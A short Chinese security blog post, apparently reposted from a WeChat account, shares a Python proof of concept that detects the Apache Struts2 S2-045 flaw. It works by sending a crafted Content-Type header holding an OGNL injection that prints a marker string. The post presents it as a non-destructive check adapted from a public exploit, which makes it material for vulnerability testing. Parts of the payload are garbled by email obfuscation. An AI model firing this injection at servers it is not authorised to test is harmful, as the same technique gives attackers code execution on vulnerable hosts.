s2-045 无损检测 PoC 分享

  • A+
所属分类:安全文章

    这次的POC由网上公开的EXP修改而来,主要是由于该EXP具有一定的攻击性,所以我们做了一个无损检测的修改,。


附上无损检测POC:



#! /usr/bin/env python

#coding: utf-8


import requests

import sys

header = dict()

header['Content-Type'] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('test'+602+53718)).(#o.close())}"


s = requests.get(sys.argv[1], headers=header)

print s.content




本文始发于微信公众号(inn0team):s2-045 无损检测 PoC 分享

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: